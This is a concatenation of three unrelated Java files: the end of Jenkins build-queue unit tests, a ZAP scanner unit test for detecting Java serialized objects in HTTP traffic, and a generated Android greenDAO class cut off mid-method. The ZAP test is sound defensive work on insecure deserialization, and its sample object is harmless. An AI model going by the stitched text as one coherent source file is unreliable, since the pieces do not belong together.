r.createFreeStyleProject(); Label label = Label.get("unknown-slave"); // Give the project an "unknown-slave" label, forcing it to // stay in the queue after we schedule it, allowing us to query it. p.setAssignedLabel(label); p.scheduleBuild2(0); JenkinsRule.WebClient webclient = r.createWebClient(); XmlPage queueItems = webclient.goToXml("queue/api/xml"); String queueTaskId = queueItems.getXmlDocument().getElementsByTagName("id").item(0).getTextContent(); assertNotNull(queueTaskId); XmlPage queueItem = webclient.goToXml("queue/item/" + queueTaskId + "/api/xml"); assertNotNull(queueItem); String tagName = queueItem.getDocumentElement().getTagName(); assertTrue(tagName.equals("blockedItem") || tagName.equals("buildableItem")); } @Issue("JENKINS-28926") @Test public void upstreamDownstreamCycle() throws Exception { FreeStyleProject trigger = r.createFreeStyleProject(); FreeStyleProject chain1 = r.createFreeStyleProject(); FreeStyleProject chain2a = r.createFreeStyleProject(); FreeStyleProject chain2b = r.createFreeStyleProject(); FreeStyleProject chain3 = r.createFreeStyleProject(); trigger.getPublishersList().add(new BuildTrigger(String.format("%s, %s, %s, %s", chain1.getName(), chain2a.getName(), chain2b.getName(), chain3.getName()), true)); trigger.setQuietPeriod(0); chain1.setQuietPeriod(1); chain2a.setQuietPeriod(1); chain2b.setQuietPeriod(1); chain3.setQuietPeriod(1); chain1.getPublishersList().add(new BuildTrigger(String.format("%s, %s", chain2a.getName(), chain2b.getName()), true)); chain2a.getPublishersList().add(new BuildTrigger(chain3.getName(), true)); chain2b.getPublishersList().add(new BuildTrigger(chain3.getName(), true)); chain1.setBlockBuildWhenDownstreamBuilding(true); chain2a.setBlockBuildWhenDownstreamBuilding(true); chain2b.setBlockBuildWhenDownstreamBuilding(true); chain3.setBlockBuildWhenUpstreamBuilding(true); r.jenkins.rebuildDependencyGraph(); r.buildAndAssertSuccess(trigger); // the trigger should build immediately and schedule the cycle r.waitUntilNoActivity(); final Queue queue = r.getInstance().getQueue(); assertThat("The cycle should have been defanged and chain1 executed", queue.getItem(chain1), nullValue()); assertThat("The cycle should have been defanged and chain2a executed", queue.getItem(chain2a), nullValue()); assertThat("The cycle should have been defanged and chain2b executed", queue.getItem(chain2b), nullValue()); assertThat("The cycle should have been defanged and chain3 executed", queue.getItem(chain3), nullValue()); } private static class TestFlyweightTask extends TestTask implements Queue.FlyweightTask { Executor exec; private final Label assignedLabel; TestFlyweightTask(AtomicInteger cnt, Label assignedLabel) { super(cnt); this.assignedLabel = assignedLabel; } @Override protected void doRun() { exec = Executor.currentExecutor(); } @Override public Label getAssignedLabel() { return assignedLabel; } } @Test public void taskEquality() throws Exception { AtomicInteger cnt = new AtomicInteger(); ScheduleResult result = r.jenkins.getQueue().schedule2(new TestTask(cnt), 0); assertTrue(result.isCreated()); WaitingItem item = result.getCreateItem(); assertFalse(r.jenkins.getQueue().schedule2(new TestTask(cnt), 0).isCreated()); item.getFuture().get(); r.waitUntilNoActivity(); assertEquals(1, cnt.get()); } private static class TestTask extends AbstractQueueTask { private final AtomicInteger cnt; TestTask(AtomicInteger cnt) { this.cnt = cnt; } @Override public boolean equals(Object o) { return o instanceof TestTask && cnt == ((TestTask) o).cnt; } @Override public int hashCode() { return cnt.hashCode(); } @Override public boolean isBuildBlocked() {return false;} @Override public String getWhyBlocked() {return null;} @Override public String getName() {return "test";} @Override public String getFullDisplayName() {return "Test";} @Override public void checkAbortPermission() {} @Override public boolean hasAbortPermission() {return true;} @Override public String getUrl() {return "test/";} @Override public String getDisplayName() {return "Test";} @Override public Label getAssignedLabel() {return null;} @Override public Node getLastBuiltOn() {return null;} @Override public long getEstimatedDuration() {return -1;} @Override public ResourceList getResourceList() {return new ResourceList();} protected void doRun() {} @Override public Executable createExecutable() throws IOException { return new Executable() { @Override public SubTask getParent() {return TestTask.this;} @Override public long getEstimatedDuration() {return -1;} @Override public void run() { doRun(); cnt.incrementAndGet(); } }; } } @Test public void waitForStart() throws Exception { final OneShotEvent ev = new OneShotEvent(); FreeStyleProject p = r.createFreeStyleProject(); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { ev.block(); return true; } }); QueueTaskFuture<FreeStyleBuild> v = p.scheduleBuild2(0); FreeStyleBuild b = v.waitForStart(); assertEquals(1,b.getNumber()); assertTrue(b.isBuilding()); assertSame(p,b.getProject()); ev.signal(); // let the build complete FreeStyleBuild b2 = r.assertBuildStatusSuccess(v); assertSame(b,b2); } /** * Make sure that the running build actually carries an credential. */ @Test public void accessControl() throws Exception { r.configureUserRealm(); FreeStyleProject p = r.createFreeStyleProject(); QueueItemAuthenticatorConfiguration.get().getAuthenticators().add(new MockQueueItemAuthenticator(Collections.singletonMap(p.getFullName(), alice))); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { assertEquals(alice,Jenkins.getAuthentication()); return true; } }); r.assertBuildStatusSuccess(p.scheduleBuild2(0)); } private static Authentication alice = new UsernamePasswordAuthenticationToken("alice","alice",new GrantedAuthority[0]); /** * Make sure that the slave assignment honors the permissions. * * We do this test by letting a build run twice to determine its natural home, * and then introduce a security restriction to prohibit that. */ @Test public void permissionSensitiveSlaveAllocations() throws Exception { r.jenkins.setNumExecutors(0); // restrict builds to those slaves DumbSlave s1 = r.createSlave(); DumbSlave s2 = r.createSlave(); r.configureUserRealm(); FreeStyleProject p = r.createFreeStyleProject(); QueueItemAuthenticatorConfiguration.get().getAuthenticators().add(new MockQueueItemAuthenticator(Collections.singletonMap(p.getFullName(), alice))); p.getBuildersList().add(new TestBuilder() { @Override public boolean perform(AbstractBuild<?, ?> build, Launcher launcher, BuildListener listener) throws InterruptedException, IOException { assertEquals(alice,Jenkins.getAuthentication()); return true; } }); final FreeStyleBuild b1 = r.assertBuildStatusSuccess(p.scheduleBuild2(0)); final FreeStyleBuild b2 = r.assertBuildStatusSuccess(p.scheduleBuild2(0)); // scheduling algorithm would prefer running the same job on the same node // kutzi: 'prefer' != 'enforce', therefore disabled this assertion: assertSame(b1.getBuiltOn(),b2.getBuiltOn()); // ACL that allow anyone to do anything except Alice can't build. final SparseACL aliceCantBuild = new SparseACL(null); aliceCantBuild.add(new PrincipalSid(alice), Computer.BUILD, false); aliceCantBuild.add(new PrincipalSid("anonymous"), Jenkins.ADMINISTER, true); GlobalMatrixAuthorizationStrategy auth = new GlobalMatrixAuthorizationStrategy() { @Override public ACL getACL(Node node) { if (node==b1.getBuiltOn()) return aliceCantBuild; return super.getACL(node); } }; auth.add(Jenkins.ADMINISTER,"anonymous"); r.jenkins.setAuthorizationStrategy(auth); // now that we prohibit alice to do a build on the same node, the build should run elsewhere for (int i=0; i<3; i++) { FreeStyleBuild b3 = r.assertBuildStatusSuccess(p.scheduleBuild2(0)); assertNotSame(b3.getBuiltOnStr(), b1.getBuiltOnStr()); } } @Test public void pendingsConsistenceAfterErrorDuringMaintain() throws IOException, ExecutionException, InterruptedException{ FreeStyleProject project1 = r.createFreeStyleProject(); FreeStyleProject project2 = r.createFreeStyleProject(); TopLevelItemDescriptor descriptor = new TopLevelItemDescriptor(FreeStyleProject.class){ @Override public FreeStyleProject newInstance(ItemGroup parent, String name) { return (FreeStyleProject) new FreeStyleProject(parent,name){ @Override public Label getAssignedLabel(){ throw new IllegalArgumentException("Test exception"); //cause dead of executor } @Override public void save(){ //do not need save } }; } }; FreeStyleProject projectError = (FreeStyleProject) r.jenkins.createProject(descriptor, "throw-error"); project1.setAssignedLabel(r.jenkins.getSelfLabel()); project2.setAssignedLabel(r.jenkins.getSelfLabel()); project1.getBuildersList().add(new Shell("sleep 2")); project1.scheduleBuild2(0); QueueTaskFuture<FreeStyleBuild> v = project2.scheduleBuild2(0); projectError.scheduleBuild2(0); Executor e = r.jenkins.toComputer().getExecutors().get(0); Thread.sleep(2000); while(project2.getLastBuild()==null){ if(!e.isAlive()){ break; // executor is dead due to exception } if(e.isIdle()){ assertTrue("Node went to idle before project had" + project2.getDisplayName() + " been started", v.isDone()); } Thread.sleep(1000); } if(project2.getLastBuild()!=null) return; Queue.getInstance().cancel(projectError); // cancel job which cause dead of executor e.doYank(); //restart executor while(!e.isIdle()){ //executor should take project2 from queue Thread.sleep(1000); } //project2 should not be in pendings List<Queue.BuildableItem> items = Queue.getInstance().getPendingItems(); for(Queue.BuildableItem item : items){ assertFalse("Project " + project2.getDisplayName() + " stuck in pendings",item.task.getName().equals(project2.getName())); } } @Test public void cancelInQueue() throws Exception { // parepare an offline slave. DumbSlave slave = r.createOnlineSlave(); assertFalse(slave.toComputer().isOffline()); slave.toComputer().disconnect(null).get(); assertTrue(slave.toComputer().isOffline()); FreeStyleProject p = r.createFreeStyleProject(); p.setAssignedNode(slave); QueueTaskFuture<FreeStyleBuild> f = p.scheduleBuild2(0); try { f.get(3, TimeUnit.SECONDS); fail("Should time out (as the slave is offline)."); } catch (TimeoutException e) { } Queue.Item item = Queue.getInstance().getItem(p); assertNotNull(item); Queue.getInstance().doCancelItem(item.getId()); assertNull(Queue.getInstance().getItem(p)); try { f.get(10, TimeUnit.SECONDS); fail("Should not get (as it is cancelled)."); } catch (CancellationException e) { } } @Test public void waitForStartAndCancelBeforeStart() throws Exception { final OneShotEvent ev = new OneShotEvent(); FreeStyleProject p = r.createFreeStyleProject(); QueueTaskFuture<FreeStyleBuild> f = p.scheduleBuild2(10); final Queue.Item item = Queue.getInstance().getItem(p); assertNotNull(item); final ScheduledThreadPoolExecutor executor = new ScheduledThreadPoolExecutor(1); executor.schedule(new Runnable() { @Override public void run() { try { Queue.getInstance().doCancelItem(item.getId()); } catch (IOException e) { e.printStackTrace(); } catch (ServletException e) { e.printStackTrace(); } } }, 2, TimeUnit.SECONDS); try { f.waitForStart(); fail("Expected an CancellationException to be thrown"); } catch (CancellationException e) {} } @Issue("JENKINS-27871") @Test public void testBlockBuildWhenUpstreamBuildingLock() throws Exception { final String prefix = "JENKINS-27871"; r.getInstance().setNumExecutors(4); r.getInstance().save(); final FreeStyleProject projectA = r.createFreeStyleProject(prefix+"A"); projectA.getBuildersList().add(new SleepBuilder(5000)); final FreeStyleProject projectB = r.createFreeStyleProject(prefix+"B"); projectB.getBuildersList().add(new SleepBuilder(10000)); projectB.setBlockBuildWhenUpstreamBuilding(true); final FreeStyleProject projectC = r.createFreeStyleProject(prefix+"C"); projectC.getBuildersList().add(new SleepBuilder(10000)); projectC.setBlockBuildWhenUpstreamBuilding(true); projectA.getPublishersList().add(new BuildTrigger(Arrays.asList(projectB), Result.SUCCESS)); projectB.getPublishersList().add(new BuildTrigger(Arrays.asList(projectC), Result.SUCCESS)); final QueueTaskFuture<FreeStyleBuild> taskA = projectA.scheduleBuild2(0, new TimerTriggerCause()); Thread.sleep(1000); final QueueTaskFuture<FreeStyleBuild> taskB = projectB.scheduleBuild2(0, new TimerTriggerCause()); final QueueTaskFuture<FreeStyleBuild> taskC = projectC.scheduleBuild2(0, new TimerTriggerCause()); final FreeStyleBuild buildA = taskA.get(60, TimeUnit.SECONDS); final FreeStyleBuild buildB = taskB.get(60, TimeUnit.SECONDS); final FreeStyleBuild buildC = taskC.get(60, TimeUnit.SECONDS); long buildBEndTime = buildB.getStartTimeInMillis() + buildB.getDuration(); assertTrue("Project B build should be finished before the build of project C starts. " + "B finished at " + buildBEndTime + ", C started at " + buildC.getStartTimeInMillis(), buildC.getStartTimeInMillis() >= buildBEndTime); } @Issue("JENKINS-30084") @Test /* * When a flyweight task is restricted to run on a specific node, the node will be provisioned * and the flyweight task will be executed. */ public void shouldRunFlyweightTaskOnProvisionedNodeWhenNodeRestricted() throws Exception { MatrixProject matrixProject = r.createMatrixProject(); matrixProject.setAxes(new AxisList( new Axis("axis", "a", "b") )); Label label = LabelExpression.get("aws-linux-dummy"); DummyCloudImpl dummyCloud = new DummyCloudImpl(r, 0); dummyCloud.label = label; r.jenkins.clouds.add(dummyCloud); matrixProject.setAssignedLabel(label); r.assertBuildStatusSuccess(matrixProject.scheduleBuild2(0)); assertEquals("aws-linux-dummy", matrixProject.getBuilds().getLastBuild().getBuiltOn().getLabelString()); } @Test public void shouldBeAbleToBlockFlyweightTaskAtTheLastMinute() throws Exception { MatrixProject matrixProject = r.createMatrixProject("downstream"); matrixProject.setDisplayName("downstream"); matrixProject.setAxes(new AxisList( new Axis("axis", "a", "b") )); Label label = LabelExpression.get("aws-linux-dummy"); DummyCloudImpl dummyCloud = new DummyCloudImpl(r, 0); dummyCloud.label = label; BlockDownstreamProjectExecution property = new BlockDownstreamProjectExecution(); dummyCloud.getNodeProperties().add(property); r.jenkins.clouds.add(dummyCloud); matrixProject.setAssignedLabel(label); FreeStyleProject upstreamProject = r.createFreeStyleProject("upstream"); upstreamProject.getBuildersList().add(new SleepBuilder(10000)); upstreamProject.setDisplayName("upstream"); //let's assume the flyweighttask has an upstream project and that must be blocked // when the upstream project is running matrixProject.addTrigger(new ReverseBuildTrigger("upstream", Result.SUCCESS)); matrixProject.setBlockBuildWhenUpstreamBuilding(true); //we schedule the project but we pretend no executors are available thus //the flyweight task is in the buildable queue without being executed QueueTaskFuture downstream = matrixProject.scheduleBuild2(0); if (downstream == null) { throw new Exception("the flyweight task could not be scheduled, thus the test will be interrupted"); } //let s wait for the Queue instance to be updated while (Queue.getInstance().getBuildableItems().size() != 1) { Thread.sleep(10); } //in this state the build is not blocked, it's just waiting for an available executor assertFalse(Queue.getInstance().getItems()[0].isBlocked()); //we start the upstream project that should block the downstream one QueueTaskFuture upstream = upstreamProject.scheduleBuild2(0); if (upstream == null) { throw new Exception("the upstream task could not be scheduled, thus the test will be interrupted"); } //let s wait for the Upstream to enter the buildable Queue boolean enteredTheQueue = false; while (!enteredTheQueue) { for (Queue.BuildableItem item : Queue.getInstance().getBuildableItems()) { if (item.task.getDisplayName() != null && item.task.getDisplayName().equals(upstreamProject.getDisplayName())) { enteredTheQueue = true; } } } //let's wait for the upstream project to actually start so that we're sure the Queue has been updated //when the upstream starts the downstream has already left the buildable queue and the queue is empty while (!Queue.getInstance().getBuildableItems().isEmpty()) { Thread.sleep(10); } assertTrue(Queue.getInstance().getItems()[0].isBlocked()); assertTrue(Queue.getInstance().getBlockedItems().get(0).task.getDisplayName().equals(matrixProject.displayName)); //once the upstream is completed, the downstream can join the buildable queue again. r.assertBuildStatusSuccess(upstream); while (Queue.getInstance().getBuildableItems().isEmpty()) { Thread.sleep(10); } assertFalse(Queue.getInstance().getItems()[0].isBlocked()); assertTrue(Queue.getInstance().getBlockedItems().isEmpty()); assertTrue(Queue.getInstance().getBuildableItems().get(0).task.getDisplayName().equals(matrixProject.displayName)); } //let's make sure that the downstram project is not started before the upstream --> we want to simulate // the case: buildable-->blocked-->buildable public static class BlockDownstreamProjectExecution extends NodeProperty<Slave> { @Override public CauseOfBlockage canTake(Queue.BuildableItem item) { if (item.task.getName().equals("downstream")) { return new CauseOfBlockage() { @Override public String getShortDescription() { return "slave not provisioned"; } }; } return null; } @TestExtension("shouldBeAbleToBlockFlyWeightTaskOnLastMinute") public static class DescriptorImpl extends NodePropertyDescriptor {} } }
/* * Zed Attack Proxy (ZAP) and its related class files. * * ZAP is an HTTP/HTTPS proxy for assessing web application security. * * Copyright 2019 The ZAP Development Team * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.zaproxy.zap.extension.pscanrulesAlpha; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.is; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.io.Serializable; import java.net.URLEncoder; import java.nio.charset.StandardCharsets; import java.util.Base64; import java.util.Map; import org.junit.jupiter.api.Test; import org.parosproxy.paros.network.HttpMessage; import org.zaproxy.addon.commonlib.CommonAlertTag; class JsoScanRuleUnitTest extends PassiveScannerTest<JsoScanRule> { /* Testing JSO in response */ @Test void shouldNotRaiseAlertGivenNoJsoHasBeenDetectedInResponse() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader("GET / HTTP/1.1"); msg.setResponseHeader( "HTTP/1.1 200 OK\r\n" + "X-Custom-Info: NOPE\r\n" + "Set-Cookie: NOPE=NOPE"); // When scanHttpResponseReceive(msg); // Then assertThat(alertsRaised, empty()); } @Test void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInHeaderOfResponse() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader("GET / HTTP/1.1"); String jso = Base64.getEncoder().encodeToString(createJso()); msg.setResponseHeader("HTTP/1.1 200 OK\r\n" + "X-Custom-Info: " + jso + "\r\n"); // When scanHttpResponseReceive(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInCookieOfResponse() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader("GET / HTTP/1.1"); String jso = Base64.getEncoder().encodeToString(createJso()); msg.setResponseHeader("HTTP/1.1 200 OK\r\n" + "Set-Cookie: CRUNCHY=" + jso + "\r\n"); // When scanHttpResponseReceive(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenRawJsoMagicBytesAreDetectedInRawBodyOfResponse() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader("GET / HTTP/1.1"); byte[] jso = createJso(); msg.setResponseHeader( "HTTP/1.1 200 OK\r\n" + "Content-Type: application/octet-stream\r\n" + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n" + "Content-Length: " + jso.length + "\r\n"); msg.setResponseBody(jso); // When scanHttpResponseReceive(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInBodyOfResponse() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader("GET / HTTP/1.1"); String jso = Base64.getEncoder().encodeToString(createJso()); msg.setResponseHeader( "HTTP/1.1 200 OK\r\n" + "Content-Type: application/octet-stream\r\n" + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n" + "Content-Length: " + jso.length() + "\r\n"); msg.setResponseBody(jso); // When scanHttpResponseReceive(msg); // Then assertThat(alertsRaised, hasSize(1)); } /* Testing JSO in request */ @Test void shouldNotRaiseAlertGivenNoJsoHasBeenDetectedInRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader( "GET / HTTP/1.1\r\n" + "X-Custom-Info: NOPE\r\n" + "Cookie: NOPE=NOPE\r\n"); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, empty()); } @Test void shouldRaiseAlertGivenUriEncodedJsoMagicBytesAreDetectedInRequestParameterOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader("GET /some_action?q=" + createUriEncodedJso() + "&p=&m HTTP/1.1"); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInRequestParameterOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); String jso = Base64.getEncoder().encodeToString(createJso()); msg.setRequestHeader("GET /some_action?q=" + jso + "&p=&m HTTP/1.1"); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenUriEncodedJsoMagicBytesAreDetectedInHeaderOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader("GET / HTTP/1.1\r\n" + "X-Custom-Info: " + createUriEncodedJso()); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInHeaderOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); String jso = Base64.getEncoder().encodeToString(createJso()); msg.setRequestHeader("GET / HTTP/1.1\r\n" + "X-Custom-Info: " + jso + "\r\n"); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenUriEncodedJsoMagicBytesAreDetectedInCookieOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); msg.setRequestHeader( "GET / HTTP/1.1\r\n" + "Cookie: CRUNCHY=" + createUriEncodedJso() + "\r\n"); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInCookieOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); String jso = Base64.getEncoder().encodeToString(createJso()); msg.setRequestHeader("GET / HTTP/1.1\r\n" + "Cookie: CRUNCHY=" + jso + "\r\n"); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenRawJsoMagicBytesAreDetectedInBodyOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); byte[] jso = createJso(); msg.setRequestHeader( "POST / HTTP/1.1\r\n" + "Content-Type: application/octet-stream\r\n" + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n" + "Content-Length: " + jso.length + "\r\n"); msg.setRequestBody(jso); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldRaiseAlertGivenBase64JsoMagicBytesAreDetectedInBodyOfRequest() throws Exception { // Given HttpMessage msg = new HttpMessage(); String jso = Base64.getEncoder().encodeToString(createJso()); msg.setRequestHeader( "GET / HTTP/1.1\r\n" + "Content-Type: application/octet-stream\r\n" + "Content-Disposition: attachment; filename=\"jso.bin\"\r\n" + "Content-Length: " + jso.length() + "\r\n"); msg.setRequestBody(jso); // When scanHttpRequestSend(msg); // Then assertThat(alertsRaised, hasSize(1)); } @Test void shouldReturnExpectedMappings() { // Given / When Map<String, String> tags = rule.getAlertTags(); // Then assertThat(tags.size(), is(equalTo(2))); assertThat( tags.containsKey(CommonAlertTag.OWASP_2021_A04_INSECURE_DESIGN.getTag()), is(equalTo(true))); assertThat( tags.containsKey(CommonAlertTag.OWASP_2017_A08_INSECURE_DESERIAL.getTag()), is(equalTo(true))); assertThat( tags.get(CommonAlertTag.OWASP_2021_A04_INSECURE_DESIGN.getTag()), is(equalTo(CommonAlertTag.OWASP_2021_A04_INSECURE_DESIGN.getValue()))); assertThat( tags.get(CommonAlertTag.OWASP_2017_A08_INSECURE_DESERIAL.getTag()), is(equalTo(CommonAlertTag.OWASP_2017_A08_INSECURE_DESERIAL.getValue()))); } private static byte[] createJso() throws IOException { AnObject anObject = new AnObject(); ByteArrayOutputStream out = new ByteArrayOutputStream(); ObjectOutputStream objectOutputStream = new ObjectOutputStream(out); objectOutputStream.writeObject(anObject); return out.toByteArray(); } private static String createUriEncodedJso() throws IOException { return URLEncoder.encode( new String(createJso(), StandardCharsets.ISO_8859_1), StandardCharsets.UTF_8.name()); } @Override protected JsoScanRule createScanner() { return new JsoScanRule(); } private static class AnObject implements Serializable { private static final long serialVersionUID = 1L; private static String value; public static String getValue() { return value; } public static void setValue(String value) { AnObject.value = value; } } }
package com.company.professor; import java.util.List; import java.util.ArrayList; import android.database.Cursor; import android.database.sqlite.SQLiteDatabase; import android.database.sqlite.SQLiteStatement; import de.greenrobot.dao.AbstractDao; import de.greenrobot.dao.Property; import de.greenrobot.dao.internal.SqlUtils; import de.greenrobot.dao.internal.DaoConfig; import com.company.professor.PokemonForms; // THIS CODE IS GENERATED BY greenDAO, DO NOT EDIT. /** * DAO for table "pokemon_forms". */ public class PokemonFormsDao extends AbstractDao<PokemonForms, Long> { public static final String TABLENAME = "pokemon_forms"; /** * Properties of entity PokemonForms.<br/> * Can be used for QueryBuilder and for referencing column names. */ public static class Properties { public final static Property Id = new Property(0, long.class, "Id", true, "id"); public final static Property Identifier = new Property(1, String.class, "Identifier", false, "identifier"); public final static Property FormIdentifier = new Property(2, String.class, "FormIdentifier", false, "form_identifier"); public final static Property PokemonId = new Property(3, long.class, "PokemonId", false, "pokemon_id"); public final static Property IntroducedInVersionGroupId = new Property(4, Long.class, "IntroducedInVersionGroupId", false, "introduced_in_version_group_id"); public final static Property IsDefault = new Property(5, boolean.class, "IsDefault", false, "is_default"); public final static Property IsBattleOnly = new Property(6, boolean.class, "IsBattleOnly", false, "is_battle_only"); public final static Property IsMega = new Property(7, boolean.class, "IsMega", false, "is_mega"); public final static Property FormOrder = new Property(8, long.class, "FormOrder", false, "form_order"); public final static Property Order = new Property(9, long.class, "Order", false, "order"); }; private DaoSession daoSession; public PokemonFormsDao(DaoConfig config) { super(config); } public PokemonFormsDao(DaoConfig config, DaoSession daoSession) { super(config, daoSession); this.daoSession = daoSession; } /** Creates the underlying database table. */ public static void createTable(SQLiteDatabase db, boolean ifNotExists) { String constraint = ifNotExists? "IF NOT EXISTS ": ""; db.execSQL("CREATE TABLE " + constraint + "\"pokemon_forms\" (" + // "\"id\" INTEGER PRIMARY KEY NOT NULL ," + // 0: Id "\"identifier\" TEXT NOT NULL ," + // 1: Identifier "\"form_identifier\" TEXT," + // 2: FormIdentifier "\"pokemon_id\" INTEGER NOT NULL ," + // 3: PokemonId "\"introduced_in_version_group_id\" INTEGER," + // 4: IntroducedInVersionGroupId "\"is_default\" INTEGER NOT NULL ," + // 5: IsDefault "\"is_battle_only\" INTEGER NOT NULL ," + // 6: IsBattleOnly "\"is_mega\" INTEGER NOT NULL ," + // 7: IsMega "\"form_order\" INTEGER NOT NULL ," + // 8: FormOrder "\"order\" INTEGER NOT NULL );"); // 9: Order } /** Drops the underlying database table. */ public static void dropTable(SQLiteDatabase db, boolean ifExists) { String sql = "DROP TABLE " + (ifExists ? "IF EXISTS " : "") + "\"pokemon_forms\""; db.execSQL(sql); } /** @inheritdoc */ @Override protected void bindValues(SQLiteStatement stmt, PokemonForms entity) { stmt.clearBindings(); stmt.bindLong(1, entity.getId()); stmt.bindString(2, entity.getIdentifier()); String FormIdentifier = entity.getFormIdentifier(); if (FormIdentifier != null) { stmt.bindString(3, FormIdentifier); } stmt.bindLong(4, entity.getPokemonId()); Long IntroducedInVersionGroupId = entity.getIntroducedInVersionGroupId(); if (IntroducedInVersionGroupId != null) { stmt.bindLong(5, IntroducedInVersionGroupId); } stmt.bindLong(6, entity.getIsDefault() ? 1L: 0L); stmt.bindLong(7, entity.getIsBattleOnly() ? 1L: 0L); stmt.bindLong(8, entity.getIsMega() ? 1L: 0L); stmt.bindLong(9, entity.getFormOrder()); stmt.bindLong(10, entity.getOrder()); } @Override protected void attachEntity(PokemonForms entity) { super.attachEntity(entity); entity.__setDaoSession(daoSession); } /** @inheritdoc */ @Override public Long readKey(Cursor cursor, int offset) { return cursor.getLong(offset + 0); } /** @inheritdoc */ @Override public PokemonForms readEntity(Cursor cursor, int offset) { PokemonForms entity = new PokemonForms( // cursor.getLong(offset + 0), // Id cursor.getString(offset + 1), // Identifier cursor.isNull(offset + 2) ? null : cursor.getString(offset + 2), // FormIdentifier cursor.getLong(offset + 3), // PokemonId cursor.isNull(offset + 4) ? null : cursor.getLong(offset + 4), // IntroducedInVersionGroupId cursor.getShort(offset + 5) != 0, // IsDefault cursor.getShort(offset + 6) != 0, // IsBattleOnly cursor.getShort(offset + 7) != 0, // IsMega cursor.getLong(offset + 8), // FormOrder cursor.getLong(offset + 9) // Order ); return entity; } /** @inheritdoc */ @Override public void readEntity(Cursor cursor, PokemonForms entity, int offset) { entity.setId(cursor.getLong(offset + 0)); entity.setIdentifier(cursor.getString(offset + 1)); entity.setFormIdentifier(cursor.isNull(offset + 2) ? null : cursor.getString(offset + 2)); entity.setPokemonId(cursor.getLong(offset + 3)); entity.setIntroducedInVersionGroupId(cursor.isNull(offset + 4) ? null : cursor.getLong(offset + 4)); entity.setIsDefault(cursor.getShort(offset + 5) != 0); entity.setIsBattleOnly(cursor.getShort(offset + 6) != 0); entity.setIsMega(cursor.getShort(offset + 7) != 0); entity.setFormOrder(cursor.getLong(offset + 8)); entity.setOrder(cursor.getLong(offset + 9)); } /** @inheritdoc */ @Override protected Long updateKeyAfterInsert(PokemonForms entity, long rowId) { entity.setId(rowId); return rowId; } /** @inheritdoc */ @Override public Long getKey(PokemonForms entity) { if(entity != null) { return entity.getId(); } else { return null; } } /** @inheritdoc */ @Override protected boolean isEntityUpdateable() { return true; } private String selectDeep; protected String getSelectDeep() { if (selectDeep == null) { StringBuilder builder = new StringBuilder("SELECT "); SqlUtils.appendColumns(builder, "T", getAllColumns()); builder.append(','); SqlUtils.appendColumns(builder, "T0", daoSession.getPokemonDao().getAllColumns()); builder.append(','); SqlUtils.appendColumns(builder, "T1", daoSession.getVersionGroupsDao().getAllColumns()); builder.append(" FROM pokemon_forms T"); builder.append(" LEFT JOIN pokemon T0 ON T.\"pokemon_id\"=T0.\"id\""); builder.append(" LEFT JOIN version_groups T1 ON T.\"introduced_in_version_group_id\"=T1.\"id\""); builder.append(' '); selectDeep = builder.toString(); } return selectDeep; } protected PokemonForms loadCurrentDeep(Cursor cursor, boolean lock) { PokemonForms entity = loadCurrent(cursor, 0, lock); int offset = getAllColumns().length; Pokemon Pokemon = loadCurrentOther(daoSession.getPokemonDao(), cursor, offset); if(Pokemon != null) { entity.setPokemon(Pokemon); } offset += daoSession.getPokemonDao().getAllColumns().length; VersionGroups VersionGroups = loadCurrentOther(daoSession.getVersionGroupsDao(), cursor, offset); entity.setVersionGroups(VersionGroups); return entity; } public PokemonForms loadDeep(Long key) { 